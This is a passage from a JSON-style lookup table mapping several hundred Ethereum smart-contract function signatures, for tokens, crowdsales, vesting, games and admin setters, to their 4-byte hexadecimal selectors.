"0xe875bfbc", "getWeiCollected()": "0x0881acd3", "setTime(uint256)": "0x3beb26c4", "getCurrentTime()": "0x29cb924d", "STQPreICO2TestHelper(address,address[])": "0xf4510455", "addCommunityGrant(address,uint256)": "0x54ee4d4b", "addVestingGrant(address,uint256,uint256,uint256)": "0xee179857", "addInvestorGrant(address,uint256,uint256,uint256)": "0xd4492c57", "addTeamGrant(address,uint256,uint256,uint256)": "0x9ea0b8f0", "setAllocations(uint256,uint256,uint256,uint256,uint256,uint256)": "0x82d4685c", "GenesisManager(address,address,address,address)": "0x2f3b24d2", "BuyableCourt(address[],uint256[])": "0x050eb8c0", "withdrawAfterTime()": "0x5e2d1f0d", "block()": "0x575cb0f6", "releaseToBuyer()": "0xfdc5bf2c", "releaseToSeller()": "0x892a0e42", "createAppeal(uint256)": "0xf0b070ca", "counterAppeal(uint256)": "0x0dc30397", "appeal(bytes32)": "0xece1de44", "executeDueToInactivity(bool)": "0x03580712", "hash(uint256)": "0xb189fd4c", "counterRequest(uint256)": "0x3b8f0ef4", "clean()": "0xfc4333cd", "actionB(uint256)": "0xe8c61c4e", "actionA(uint256)": "0x8981a7ca", "executeRulingB(uint256)": "0xf7ffc366", "executeRulingA(uint256)": "0xd0683428", "ruleB(uint256)": "0x41a82cc1", "ruleA(uint256)": "0x2d7da889", "nbDispute()": "0xd9852ca9", "activatedJuryTokens(address)": "0x2b0ebfe9", "activatedArbitrationTokens(address)": "0xade716e5", "getVoteAccount(uint256,uint256,uint256)": "0x82495626", "getVoteStake(uint256,uint256,uint256,bool)": "0x3c890e4c", "getHasVoted(uint256,address)": "0x6a0c5723", "getAppeals(uint256)": "0xb098bdba", "executionOpen()": "0xb4f20aa9", "penalizationOpen()": "0x14a4a273", "appealOpen()": "0x08b83b08", "voteOpen()": "0x788d3851", "disputeOpen()": "0x836028a2", "_nextBudgetStartAndEndAndOfficalVotingTime()": "0xa328f90b", "_budgetEndAndOfficalVotingTime(uint256)": "0x78abf854", "_isThereAnOnGoingTapProposal()": "0xf72fc599", "_enableRefunds()": "0x5cb92dc7", "receiveInitialFunds()": "0xf8b3d3b1", "remainingFunds()": "0xa5aa542e", "isRefundLocked()": "0xd2a718ec", "withdrawOnNoAvailablePlan()": "0xb31a404a", "voteForRefund(bool)": "0x6125fd20", "voteForTap(bool)": "0xa69358aa", "newRefundProposal()": "0xbcd533ae", "newTapProposalFromCompany(uint256)": "0xba941154", "newTapProposalFromTokenHolders(uint256)": "0x466e37e7", "tryFinializeLastProposal()": "0x604e4732", "numberOfBudgetPlan()": "0x35a4015d", "isNextBudgetPlanMade()": "0x23aea69d", "isThereAnOnGoingProposal()": "0x8722860e", "enableTeamWithdraw()": "0x7fb7b5ed", "_preSale(address,uint256)": "0x8c518026", "burnAll(address)": "0x7e9d2ac1", "setFundContract(address)": "0x59144baa", "toUnixtime(uint32,uint8,uint8,uint8,uint8,uint8)": "0xf119a48d", "toGMT(uint256)": "0x41db61e1", "AtomUX()": "0xda1f6433", "RICTToken()": "0xfcd0a747", "callContract(address,bytes)": "0x03710668", "recoverAndSetSecretHash(string,bytes32)": "0x1c2f2f9f", "approveFST(address,uint256)": "0x72c9a5e3", "transferAndCallFST(address,uint256,bytes)": "0x10eb5a8c", "transferFromFST(address,address,uint256)": "0xcb1de087", "transferFST(address,uint256)": "0x71612620", "transferMoreETH(address,uint256)": "0xf4d22b02", "getFSTBalance()": "0xae117f3e", "bigMoney()": "0x67e22888", "Medallion()": "0x1e59b53f", "ownerSetZlotsAddress(address)": "0x82004053", "getZethrTokenBankroll(uint256)": "0xe9f6af47", "payOutWinner(address)": "0xb36c973e", "gameTokenAmount(address)": "0x13b84004", "RGLSToken()": "0x77ea8c72", "CanBaoToken()": "0xeb4be616", "createVesting(address,uint256,uint256,uint256,uint256,bool,address)": "0xabf19801", "initVesting(address,uint256)": "0x55954b49", "LinaAllocation(address,uint256)": "0xc1eb50a7", "PeriodicTokenVesting(address,uint256,uint256,uint256,uint256,bool,address)": "0x7ba992fc", "AICoin(address,uint256)": "0xa8e1b53f", "setResume()": "0xd33ecfee", "setPause()": "0xd431b1ac", "FED(uint256,string,uint8,string)": "0xd6ccb332", "MJOYToken()": "0x82f128f7", "getTotalDonations()": "0x777c658f", "getSencBalance()": "0x7f1165c1", "sencToken()": "0x9c03f17f", "GongPanToken()": "0xae03f754", "Pandemica()": "0x513d085b", "QRReal()": "0x2a6cc9bf", "setDistributionMinter(address)": "0x46ba7783", "wed()": "0x68aee9e8", "registerAddress(string,address,address)": "0xbd0100c9", "extractFund(uint256)": "0xfc7fcae1", "changeRaceOwnership(address,address)": "0x14900396", "manualRecovery(address)": "0x98bffb2a", "enableRefund(address)": "0x283acbfc", "spawnRaceManual(uint256,uint256,bool)": "0xbdcd21a1", "ethorseOracle(address,bytes32,string,bool)": "0x227bf6b8", "setupRace(uint256,uint256,address)": "0x96ffac0b", "MerlinCash(uint256,string,string)": "0x9678df74", "EmiratesCoin()": "0xa721d9d9", "TON()": "0x75383265", "YSH()": "0x6b33aeb8", "CreateDummyPlayer(bytes32,uint8,uint256,address)": "0x425543f1", "CreateSpecialPlayer(bytes32,uint8,uint8,uint256,uint256,address)": "0xfde63e96", "ToggleFreezeToken(uint256)": "0x07c4e9e4", "setTechnicalAdmin(address)": "0x03cc5e4d", "setMarketingAdmin(address)": "0xdbaab3e1", "setFinancialAdmin(address)": "0xcb1ab340", "setMainAdmin(address)": "0x9a3aed36", "multiDecreaseApproval(address[],uint256[])": "0x72a7b8ba", "multiIncreaseApproval(address[],uint256[])": "0x035f057d", "multiApprove(address[],uint256[])": "0x50e8587e", "StandardToken(uint256,string,uint8,string)": "0xd1682600", "currentBlockHashCst()": "0xcd7ba8fd", "currentBlockHash()": "0x19e0eb0e", "FunWorldCoinToken()": "0x2ef8c22b", "hasSameArrayLength(address[],uint256[])": "0x5c1671a6", "hasEnoughBalance(address,uint256)": "0xe359cbbb", "isUnfrozenAccount(address)": "0xff46f210", "isUnLockedAccount(address)": "0x1a8432ea", "isAvailableAccount(address)": "0xa3d88453", "isNonZeroAccount(address)": "0x98d0b85f", "transferFreezership(address)": "0x4231e2d7", "transferDistributorship(address)": "0xecd9c155", "transferCollectorship(address)": "0x28ea0fc3", "IHate0xBTC(string)": "0x9c62622d", "setParameters(uint256,uint256,uint256,uint256,uint256,uint256)": "0x282c8749", "chip(uint256)": "0x8c6aefcf", "_resetMine()": "0x93762cff", "_transferOwnership(address,address)": "0x479245bb", "Follor()": "0x3187878b", "bankrollExternalUpdateTokens(uint256,uint256)": "0xef4ef103", "ICOBuy()": "0xa53367dc", "getWeekBonus(uint256)": "0x864ce5dc", "getBonusMultipierInPercents(uint256)": "0x6bae116f", "calculateAmountBoughtICO(uint256,uint256)": "0x13c667d1", "setHalt(bool)": "0xf4954387", "setNameAndTicker(string,string)": "0xc388c167", "HardcodedCrowdsale(address)": "0xa7f95a92", "transitionState()": "0x6e70de82", "advanceState()": "0x84ecdaf6", "demint(address,uint256)": "0x2ee119cb", "endAirDrop()": "0x707bd28b", "unfreezeTransfersSince(string)": "0xa7bf1cbf", "freezeTransfersSince(uint256,string)": "0xf717c310", "getFreezeSinceDetails()": "0xf0c4c339", "getFreezeUntilDetails()": "0x90caa2b4", "tokenDecimals()": "0x3b97e856", "tokenSymbol()": "0x7b61c320", "tokenName()": "0x6c02a931", "editRestrictedAddress(address,bool)": "0x4941d059", "withdrawSOC(uint256)": "0xbf4a63f8", "DepositSlot(address)": "0xc7ed4555", "changePartner3(address)": "0x5538689c", "changePartner2(address)": "0xce5659bc", "changePartner1(address)": "0x48f221b6", "changeMedia(address)": "0x307f6244", "changeDesigner(address)": "0x3a74b05b", "withDrawFees()": "0x434847e0", "SFTSEV()": "0xf3fbfc60", "calculateToFund()": "0x51e10aa6", "totalWeiRaised()": "0x53f4db01", "claimPrivateTokens(address[],uint256[])": "0xf3d7c6f7", "SEEDWhitelist()": "0x3ac14078", "SEED()": "0x0edc4737", "BlupassToken()": "0x4ac38f13", "Arcus()": "0x7a208990", "rechargeRobot(uint256)": "0xcfcc7720", "open5Chest()": "0xc74b5a3e", "openChest()": "0x6f49a3c0", "init(address,uint256)": "0x399ae724", "_generateDetail(uint256)": "0x71bc9d62", "getAllDetails(address)": "0xe12073a0", "getMiningDetail(uint256)": "0x895d4e1b", "buyChest()": "0xcd63acf9", "getMyChest(address)": "0x5ade7c8a", "addOwnershipChest(address,uint256)": "0xdeffbaee", "getAllRightLeg()": "0xe91a68bf", "getAllLeftLeg()": "0xe02c3b5d", "getAllPelvic()": "0x3a62f663", "getAllRightHand()": "0x29ce7fc1", "getAllLeftHand()": "0x31b61ece", "getAllHousing()": "0xd17be133", "getAllHead()": "0x28f66b77", "ownerOfRobot(uint256)": "0x3bbb0025", "transferFromRobot(address,address,uint256)": "0xc5c872ae", "approveRobot(address,uint256)": "0x4819d270", "transferRobot(address,uint256)": "0xa216e0aa", "balanceOfRobots(address)": "0xbf9fc4e2", "_approveRobot(uint256,address)": "0xb9a0c1bb", "_ownsRobot(address,uint256)": "0xd3050195", "setWallet(address,address,address,address,address)": "0x9a2a224a", "transferOnWallet()": "0xc2494dbf", "BaseContract()": "0xce563036", "_transferRobot(address,address,uint256)": "0xb780ef58", "costRecharge(uint256)": "0xc7d5d171", "_checkDetail(uint256,uint8)": "0x2f38b55a", "getAllAssembly(address)": "0x49fd5f64", "getAssembly(uint256)": "0xadfc36a3", "startMining(uint256)": "0x47b272c0", "changeAssembly(uint256,uint64[],uint64[])": "0xdf6c7cf4", "gatherDetails(uint64[])": "0x5f073f49", "getDetail(uint256)": "0x9d66a9cd", "createDetail(address,uint256)": "0x0780a196", "VCCoin(address)": "0x8a0cbf50", "FOCToken()": "0x233bf71e", "downTick(uint256,uint256)": "0x41a928fe", "fulfilled(bytes32,address)": "0x89198fed", "create(bytes32,address,address,uint256)": "0x29daf3ce", "getIdentityWallet(address)": "0x7b5bd741", "verifyOwnership(address,address)": "0x07957360", "registerSimple()": "0x5db3f963", "register(address,uint8,bytes32,bytes32)": "0x3c56e2ae", "setPauseCutoffTime(uint256)": "0xc84c5963", "pauseCutoffTime()": "0x59aef196", "CryptoAdsToken(uint256)": "0xa608a65b", "REOC()": "0x98fdb377", "LanxangCash()": "0x809e243d", "EmrCrowdfund(uint256,uint256,string,string)": "0x79c66892", "shuffle(uint256[])": "0x54f1469c", "setNote(string)": "0x2d7b299d", "setName(string,string)": "0x5c707f07", "certifyAccount(address,bool)": "0xa4f927d5", "freeze(bool)": "0xb5bf15e5", "setFund(address,string)": "0x165e2eea", "setRule(address,string)": "0x102ce658", "assignFrom(address,address)": "0x5bb4df3c", "_assign(address,address,address)": "0xb96c10ba", "save(address,uint256,uint256,uint256,string,string,uint256)": "0x3d13aec8", "_save(address,uint256,uint256,uint256,string,string,address,uint256,uint256)": "0x10acec5d", "register(address,string)": "0x32434a2e", "setKey(string)": "0xaf42d106", "setDayWithdraw(uint256)": "0x6b847dc0", "setSingleWithdrawMin(uint256)": "0x6cc61d86", "setSingleWithdrawMax(uint256)": "0xd21cf24f", "initialChargeFeePool(address)": "0xb91bf310", "initialChargeFee(uint256)": "0x7b02b6de", "initialMonthWithdraw(uint256)": "0xd31cfed6", "initialDayWithdrawCount(uint256)": "0x05160860", "initialDayWithdraw(uint256)": "0xbd6206ec", "initialSingleWithdrawMin(uint256)": "0x18c2d4c9", "initialSingleWithdrawMax(uint256)": "0xeee007e2", "withdrawWithFee(address,uint256,uint256)": "0x240705eb", "freezeTokens(address,uint256)": "0xa4df6c6a", "EcologicalShield()": "0xa6f99922", "Anaco()": "0x86b6b721", "GOLDBARToken()": "0x78127ee7", "PatrickHuynhToken()": "0x2ccf27bb", "PreIco(uint256,uint256,address,uint256)": "0x72abee88", "allocateRemainingTokens()": "0x4793cebe", "EladCrowdsale()": "0x1b72410b", "changeToken(address,address)": "0x20cc7b4e", "VergeDark()": "0xae96b094", "Cef()": "0x88ec6f42", "WyvernDAOProxy()": "0x68a8c5eb", "delegateProxyAssert(address,bytes)": "0xa018f2b2", "delegateProxy(address,bytes)": "0xfc74dadd", "BetCommunity()": "0x0ca4f838", "Finapse()": "0xb4b2938a", "payReceiver(address)": "0x32b680d6", "withdrawMyDividend()": "0x393eefb8", "changeFallbackAccount(address)": "0x6a4b22da", "ImmutableShares()": "0xe0e3b9d7", "migrateTokens(address,address)": "0x9869f1b7", "prependUnderscore(string)": "0xfe786c5f", "setClaimSignerAddress(address)": "0xb4cbdd8b", "setClaimRepository(address)": "0x6cd7d86e", "setFundRepository(address)": "0x740e2a29", "removePrecondition(uint256)": "0x7b07788e", "addPrecondition(address)": "0x85f52984", "createClaimMsg(bytes32,string,string,address)": "0x3606c983", "validClaim(bytes32,string,string,address,bytes32,bytes32,uint8)": "0xd5f0400e", "claim(bytes32,string,string,address,bytes32,bytes32,uint8)": "0xb81b0b6a", "doFunding(bytes32,string,address,uint256,address)": "0xf9195a30", "etherFund(bytes32,string)": "0xc00daefe", "fund(bytes32,string,address,uint256)": "0x9963a8e0", "isValid(bytes32,string,address,uint256,address)": "0xa8c23cb9", "charToByte(bytes1)": "0x0f4acfcd", "addressToString(address)": "0x5e57966d", "getDateInfo(uint256)": "0xc34c6b93", "IamGROOT()": "0x4ecb5e79", "BTHBCoin()": "0x2ff36e9b", "ACTION()": "0xdbd55fb3", "MFToken()": "0x27158b7b", "LiquidityNetworkToken()": "0xb5f228d7", "writeMessage(string)": "0xb588bfad", "HSCC()": "0x8c7e763b", "RealEstateCryptoFundAirdrop(address)": "0x3e3f4e24", "Airdrop(address)": "0x84b8d6a5", "FARTCOIN()": "0x0681ae70", "leggiMsg(uint256)": "0x09386cc6", "totaleMsg()": "0xc9a77e3d", "aggiungiMsg(string)": "0x0b95c8ae", "raccoltaMessaggi()": "0x3859d609", "UNK()": "0x99de4fc5", "RusgasCrowdsale()": "0x6cca940a", "QosinusCoin()": "0x8fb51ccd", "paint_pixel(uint256,bytes3,uint256)": "0xb0dd15a6", "LowerStartingPrice(uint256)": "0x047ba641", "StartingPrice()": "0x25cfa566", "BatchPaint(uint8,uint256[],bytes3[],uint256[])": "0x9cccb272", "Paint(uint256,bytes3)": "0xf0bf1aea", "HalvingInfo()": "0x1594060a", "max_index()": "0xca8b42e4", "usingCanvasBoundaries()": "0x67f8ca42", "usingOwnership()": "0x5ed66998", "ArteumToken()": "0x25449c54", "ForwarderFactory(address,bytes32,address)": "0xebb4ac3c", "changeForwardTo(address)": "0xe002a486", "Forwarder(address,bytes32,address)": "0xecfa3292", "createNew(bytes32,address)": "0xe4424c9e", "Factory(address,bytes32,address)": "0x8382a574", "RegBase(address,bytes32,address)": "0xc8c388eb", "changeResource(bytes32)": "0x021f36a4", "endGamblingParty(uint256,int256,int256)": "0x51c15991", "endMatch(uint256,int256,int256)": "0x66949b56", "foundNewGamblingParty(uint256,uint256,uint256,uint256,uint256,uint256)": "0x880ade5b", "getWinLoseAmountByBettingIdInGamblingParty(uint256,uint256)": "0x81b1c6bb", "getWinLoseAmountByBettingOwnerInGamblingParty(uint256,address)": "0xbf0b47ce", "getSumOfGamblingPartiesBonusPool(uint256)": "0x009a1faf", "getMatchSummarizeInfo(uint256)": "0x68f88a26", "getGamblingPartySummarizeInfo(uint256)": "0xd8a74c7c", "getGamblingPartyInfo(uint256)": "0xd732d30e", "lockUnlockGamblingPartyForBetting(uint256,bool)": "0x6d245bda", "lockUnlockMatchGPForBetting(uint256,bool)": "0xdae611c4", "remainingBettingFor(uint256)": "0x18f0db29", "betting(uint256,uint8,uint256)": "0x9a40a316", "_availableBetting(uint256,uint8,uint256)": "0x660ba74e", "ECR20HoneycombToken()": "0x03df1550", "BHB(uint256,string,string,uint8)": "0x150aaf74", "canTransferIfLocked(address,uint256)": "0x75d7e8ea", "addTokenLock(address,uint256,uint256)": "0x212ebbd6", "SOLID()": "0x8a662b59", "DecalinxCoin()": "0x32a54712", "frozenForTeam()": "0x63784191", "initRegister()": "0x68d3fb7b", "HaiWang(uint256,string,string)": "0xad0d4c3d", "WeBuyAnyHouse()": "0x56c6a608", "URMBToken(uint256,string,string,address)": "0x6b1b68ad", "getTokenByBid(uint32)": "0x4833c47c", "claimSiteToken(uint8,uint256)": "0xfda27af2", "setContract(address,address)": "0x2bf6e0a5", "sale3(address,uint256)": "0x3bead271", "sale2(address,uint256)": "0x5f309123", "sale1(address,uint256)": "0x300182b8", "setEndStage3(uint256)": "0xea903c78", "setStartStage3(uint256)": "0x63d6727a", "setEndStage2(uint256)": "0x5928aedc", "setStartStage2(uint256)": "0xe1da4f85", "setEndStage1(uint256)": "0xf84ce165", "setStartStage1(uint256)": "0x187fac20", "setEndCloseSale(uint256)": "0x892d31e8", "setStartCloseSale(uint256)": "0xf3ca824c", "INC()": "0xe4932abe", "registerAsset(string,bytes32)": "0x7e32fc47", "removeInstitutionAsset(string,string)": "0xcf82601b", "updateInstitutionAsset(string,string,address,address)": "0x8e6d7db8", "registerInstitutionAsset(string,string,address,address)": "0x1c3c295e", "registerInstitution(string,address,address)": "0xd600630c", "changeInstitutionOwner(string,address,address)": "0xf2057179", "mod9710(bytes)": "0xe98c7608", "prepare(bytes)": "0xd7768c47", "decodeIndirect(bytes)": "0xee9ce090", "HuaTuoToken()": "0x145eb4ee", "TimeToMeet()": "0x938b643b", "WithdrawAndTransferToBankroll()": "0x0bb954c9", "WithdrawToBankroll()": "0x714490ab", "WithdrawTokensToBankroll(uint256)": "0x7c0ff00c", "zethrBuyIn()": "0x65036ca9", "contractTokenWithdrawToFreeTokens(address,uint256)": "0xb1b30533", "dumpFreeTokens(address)": "0xaa1cf1cd", "changeAllocation(int256)": "0xac1d6fe2", "removeGame(address)": "0xbce24669", "addGame(address,uint256)": "0x5dce431b", "gameRequestTokens(address,uint256)": "0x8ccd227c", "getData(bytes)": "0x1431b23a", "changeAllocation(address,int256)": "0x815def1a", "execute(address,uint256,uint256,bytes)": "0x82916381", "LAUCHCONTRACT()": "0xa4bbf1a7", "MakeItWeinSec()": "0xa7bd4791", "MyFreezeContract(address)": "0xa7d8287d", "setFreezeAdmin(address)": "0x18a7bad6", "FreezeAdmin()": "0x5c71dec8", "killFrost()": "0xbdf82b2a", "transferAgent(address)": "0x8935860d", "addFrostTokensMulti(address[],uint256[],uint256[])": "0x4c10d0a5", "transferAndFrostTokens(address,uint256,uint256)": "0x2b8b1bc4", "addFrostTokens(address,uint256,uint256)": "0x078d1258", "addCrowdSaleTokensMulti(address[],uint256[])": "0x4248afe8", "addCrowdSaleTokens(address,uint256)": "0xa7577542", "addPreSaleTokensMulti(address[],uint256[])": "0x370e052b", "addPreSaleTokens(address,uint256)": "0xfa4fb369", "addPrivateSaleTokensMulti(address[],uint256[])": "0x3c8b6597", "addPrivateSaleTokens(address,uint256)": "0xe5a3c0ad", "addUniqueSaleTokensMulti(address[],uint256[])": "0x4b963025", "addUniqueSaleTokens(address,uint256)": "0x0037dd47", "setTeamContract(address)": "0x906d5785", "startListing()": "0xf3c8f3ef", "getReservedTokens(uint256)": "0x5452b7d4", "getFoundersTokens(uint256)": "0x0d480993", "viewReservedTokens()": "0x906ca728", "viewFoundersTokens()": "0x269c4bca", "checkVestingWithFrozen(address)": "0x6ba7d28a", "checkVesting(address)": "0xd8d4ec02", "BARToken()": "0xef57cbec", "setNumberClaimToken(uint256)": "0x64379150", "setPriceClaim(uint256)": "0x54057aa6", "changeTime(uint256,uint256)": "0x707188c1", "FtC()": "0xb31a17f0", "Ninecoin()": "0xbc8b336d", "getRaised()": "0xb692c89d", "setReached(bool)": "0x63df9769", "confirmBatch(address[])": "0xf179c6ef", "calculateHolderPiece(address)": "0xa3536b0c", "calculatePie()": "0x379698c1", "calculateTokens(address)": "0x91b7ad06", "isConfirmed(address)": "0x18e4ac35", "_confirm(address)": "0xf782b2ea", "_canSetReferrer(address,address)": "0x6926cc7b", "_addBonusOfReferrer(address,uint256)": "0x815847df", "_topBonus()": "0x4db4eae6", "_addBonusOfTop(address,uint256)": "0x2a31c5b8", "buyTokensByReferrer(address,address)": "0x560a665a", "getCurrentInvestments()": "0x09442d66", "withdrawInvestments()": "0xa3916164", "setTokenReturnRate(uint256)": "0xb2a5a012", "getMinimumPurchase()": "0xaf5b065a", "getTokenReturnRate()": "0x9eaeca9f", "updateTokenInvestorBalance(address,uint256)": "0x79fdf548", "returnMasterNodes(address,uint256)": "0xfdc24095", "buyMasterNodes(uint256,uint256)": "0xbf9f01f8", "unfreezeTokens(address,uint256)": "0xe9b2f0ad", "qtyValidators()": "0x96de6caa", "satoeLocked()": "0x2a14314f", "vestedAddress()": "0xdb171754", "AMBASSADOR_FOUR()": "0xf47cd133", "coreTeamMemberOne()": "0xe0462d0a", "month48Allocated()": "0x0e3b70fd", "constructionEnd()": "0x291ea526", "lowRate()": "0x94525e12", "maxPower()": "0xa5e11729", "withdrawalCounter()": "0x20d786b5", "icoDiscountPercentageLevel2()": "0xad07008f", "warriorBlock()": "0xa4be64a4", "finishDate()": "0xf400a3d7", "Pot()": "0xc77810a4", "checkAccBalance()": "0x607ecd96", "DISCOUNT_TOKEN_AMOUNT_T2()": "0x238fcbf8", "startEarlyStage2()": "0x6634d917", "sellQuantity()": "0x3a180fee", "last_slot()": "0x5e987d32", "nextCommonTTMTokenId8()": "0xd13e0808", "SALE_END()": "0x9aa0ff7b", "useAddr()": "0xfa73f074", "mtcLastDay()": "0xb68c6ae3", "emergencyReserve()": "0x90a2e1ef", "getRealmNum()": "0x453eca78", "simulatedBlockNumber()": "0xd15ecbc2", "totalAuction()": "0x8252ad9c", "tktPrice()": "0xb888a66b", "balanceFinney()": "0x7bc58805", "own()": "0x99cdee0e", "discountMultiplier()": "0xb1d7ee21", "unblockTokens()": "0xe9105cf1", "_getCurrentRoundInfo()": "0x4496a7ea", "timeBeforeJackpotReset()": "0xa9496e73", "maxValidators()": "0x08ac5256", "isLockedConfig()": "0xd0e0e8f6", "numOfLegendary()": "0x8957d6f2", "manualTransferToken()": "0x3b079e10", "shopShield()": "0x21cdb03c", "ETHtoZCOrate()": "0x9f6dcd9d", "maxCost()": "0x13517fea", "isCompleted()": "0xfa391c64", "PERCENT_RATE()": "0x2e6f3e4a", "council()": "0xe2c6d41c", "pregnantPoniesies()": "0x8a4e4639", "prometheusSoldCount()": "0x178c02e9", "CROWDSALE_TOKENS_NUMS()": "0x11b63a17", "VPE_address()": "0xa39fa2f6", "scannedCaps()": "0x4509052f", "dropable()": "0xb03941bc", "migrationStartedTime()": "0x326dd62d", "getBlockHash()": "0x9663f88f", "DevFee()": "0x5997ed4c", "NVBSupply()": "0x2cb676be", "returnUnsoldSafe()": "0xeaf59375", "lockBlock()": "0x4a63b3d3", "maxBuyAmount()": "0x88e765ff", "TEAM_BONUS_PERCENT()": "0xf56b8a46", "OWNER_TRANSFER_TOKENS()": "0x1c1401e7", "PRESALE_WALLET()": "0x44a5450f", "YES()": "0xb2449d65", "minimumInvest()": "0xb10ed487", "creator_new()": "0x8ce2ae2d", "coinPrice()": "0xad0f2916", "forwardPurchaseFeesTo()": "0x75849902", "ShareActive()": "0x9e28abaf", "initialBlockNumber()": "0xb3ae65d7", "stage_1_TokensSold()": "0xfb497ad2", "Organization()": "0x58e71b15", "lastProof()": "0x59d6b35b", "endAtBlock()": "0x50ff2015", "rightAndRoles()": "0x61cdd2dc", "investmentBTC()": "0xb94f969c", "accountAddressForSponsee()": "0xc1918e90", "Test6()": "0xa43b2ed0", "totalFeesValue()": "0x6e1ece25", "TOKEN_PRICE_THOUSANDTH()": "0xf0757a91", "caddress()": "0xb9e722cd", "ownerPrice()": "0xe3f596a4", "Transfer_data_enabled()": "0xcda8300e", "MIN_INVEST_BOARD()": "0xcaa7590d", "tokenBaseRate()": "0x76e6dbc7", "latestValue()": "0x4ab5cc82", "_STCnContract()": "0x930e23b9", "setRefundable()": "0x7ba7dcea", "canmint()": "0x47b4f943", "titleCount()": "0xda7545d0", "crowdsaleBeneficiary()": "0xbf6537a0", "allowInvestment()": "0x95612ec0", "startEarlyStage4()": "0xa2d6f8de", "currentAwards()": "0x846639dc", "deployedTime()": "0x461ac019", "CONTRACT_PROVIDER_ADDRESS()": "0xb2de1a3f", "currentTokenSupply()": "0xd9779fbe", "openPreSale()": "0x33bffccc", "limitDefaultType()": "0xe5269bbf", "lockTotalSupply()": "0xebeb0f48", "matchesDelay()": "0xbb537ced", "founderLockup()": "0x83e811a6", "releaseValue2()": "0xcc23a690", "InitiatePayout(address,string,string)": "0x6503a701", "UpdatePremiumLimit(uint256,uint256)": "0xf7493c6a", "UpdateBackedAmount(uint256)": "0xe6ae0536", "UpdatePoolState(uint8)": "0xd6b53175", "UpdatePolicyState(address,string,string,uint8)": "0xd6d86646", "CheckAllowance(address)": "0x7215b96d", "CheckEligibility(address,string,string)": "0xe4db4dc1", "GetCurrentPoolAmount()": "0x4b4e38df", "SubmitClaim(address,string,string)": "0x4733a341", "GetPolicy(address,string,string)": "0x0c8bdcfa", "MakeTransaction(address,uint256,uint256,string,string,uint8)": "0x4f6d97ed", "computePoolAmount()": "0x217bd046", "isEligible(address,string,string)": "0x4b86fc5b", "FindX()": "0x5695dd8c", "returnBet(uint64)": "0xe76dd3ef", "getReward(uint64)": "0x5b31035d", "acceptOffer(uint64)": "0xf23bc4f8", "acceptBet(uint64)": "0x9a7e00ef", "createOffer(uint64,uint256)": "0x819f2494", "createBet(uint64,uint256)": "0x215a6ce4", "force_deduct_fees()": "0xe9253156", "deduct_fees()": "0xaa0d30f3", "DappHunt()": "0xbdf499e1", "curryChickenToken()": "0xbe9117cc", "changeRandomOrgAPIKey(string)": "0xf7c0085b", "offerSacrifice()": "0xc3cbc2c9", "writeToDiary(uint256,bool)": "0xf07065b3", "setPatient(string,uint256,address,string,string,uint256,uint256)": "0x7d3ee409", "addZiekenhuis(address)": "0xca1a9433", "removeArts(address)": "0xe7271c34", "addArts(address)": "0x1a6b0e73", "isAllowed(string,string)": "0x54f12a2c", "changeBeneficiaryAddress(address)": "0x12d0e65a", "setIcoMin(uint256)": "0x14061862", "setPreIcoMin(uint256)": "0x317b4b76", "setIcoDiscount(uint256)": "0x3fec1a75", "setPreIcoDiscount(uint256)": "0x5c100cc2", "setPreIcoCap(uint256)": "0x7ded2210", "setIcoStart(uint256)": "0x591108a5", "setPreIcoEnd(uint256)": "0xeb18fbe7", "setPreIcoStart(uint256)": "0xcb0a3889", "generateCryptsyToken()": "0xcf47c326", "increaseQuota(uint256,uint256,address)": "0x3d83ed36", "speciesSymbol(uint256)": "0x2f6f1c68", "createSpecies(uint256,string,address)": "0xf2fdfe34", "totalSpecies()": "0xec68a73d", "batchExchange(address[],uint256[])": "0xd721b0af", "EST(uint256,string,string)": "0x3844426c", "withdrawContributorPot()": "0xad395939", "setCrowdsaleAndVesting(address,address,address)": "0xe2869f70", "SetOwned()": "0xaea40787", "divvy(uint256,address,uint256)": "0xea4cc7eb", "getDrawEthAmount(uint256,address,uint256)": "0xa3393a35", "getAmTokenBalance(address)": "0x73fa9ce8", "getRoundEth(uint256)": "0xcb5fa63f", "newPassword(string,uint256)": "0xe3bc2bb5", "YFJToken()": "0x5d740d62", "SetA(uint256)": "0x577ef53d", "MeosunToken()": "0xdd4253f7", "getOwnerEth()": "0xc5dacf68", "moveTokenICO(address,uint256)": "0xe5f4906a", "investExt(address,uint256)": "0xb89f3025", "autoMint()": "0x3768304c", "transferTo(address,uint256,bytes)": "0x495fe25b", "comelBabyCoin()": "0x032cfa5c", "updateTelegram(uint256,string)": "0x4668b43b", "deleteCountry(uint256)": "0x0f22a95d", "createCountry(string,string,string,uint256)": "0x3be93b98", "CentsToken()": "0x481b3dbb", "ModifyMine(address,bool,string,uint256)": "0x7d0981dd", "RegisterMine(string,uint256,address)": "0x0e88c4a4", "MinasAlbarit()": "0x19fa55bd", "sendFunds(address,uint256,uint256,uint256)": "0x9e81c4b3", "KY8000Token()": "0x5cd42150", "give(address,address,uint256)": "0xec8b283c", "coupon(address,address,uint256)": "0x924ca61a", "price(address,uint256,uint8)": "0x0f5ea100", "store(bytes,address,uint256,uint8)": "0x440878c4", "user(address,address)": "0xbb0a420a", "badge(address,address,uint8)": "0x20ed1a52", "exp(address,address,uint256)": "0xe86310eb", "level(address,address,uint256)": "0x89a83701", "rank(address,address,uint256)": "0x8cce10c8", "newUpdater(address,address)": "0xd3bd6e23", "updater(address)": "0x1181324b", "badge(bytes)": "0x90d8a4be", "master(address)": "0x9ed153c0", "setting(bytes)": "0xc92a1e26", "badge(uint8,string,bytes)": "0xf0413191", "AitasChain()": "0x0a738559", "TRexCoin()": "0xa51e81bb", "Bitsonatoken()": "0xe27f1692", "changeStatus()": "0x085634ec", "setMap(string,string)": "0xb6f0391b", "isMapped(string)": "0xdca60034", "SCDCToken1()": "0x6e62825a", "StatXCoin()": "0xc7e40b3a", "EnvironToken()": "0x6942dc03", "insertDate(uint256)": "0xf15caaa9", "finishTransfer(uint256)": "0x6094fae8", "c_MinInvestment()": "0xfda80435", "getD()": "0x1a14ff7a", "approvedWallet()": "0xf2a7e624", "priceEth()": "0x2ca38363", "icoPhaseDiscountPercentage2()": "0xd8e476ab", "lockingContract()": "0x4b256137", "UNLOCK_OUTINGRESERVE()": "0x4f052b82", "brideAddr()": "0xa617aff1", "Dev_Supply()": "0x41b8547c", "isSetupMode()": "0xfa18dd2b", "contributionCap()": "0x95816a16", "preicostarted()": "0x6480d014", "PIOE()": "0xbe89900b", "preSaleBlockNumber()": "0x52030899", "eachUnfreezeValue()": "0x9c043783", "luckyStoneEarning()": "0x3b6b639c", "maxEarlyStage()": "0x7aada63b", "anotherOwner1()": "0x1b900c27", "saleSuspended()": "0x508a8976", 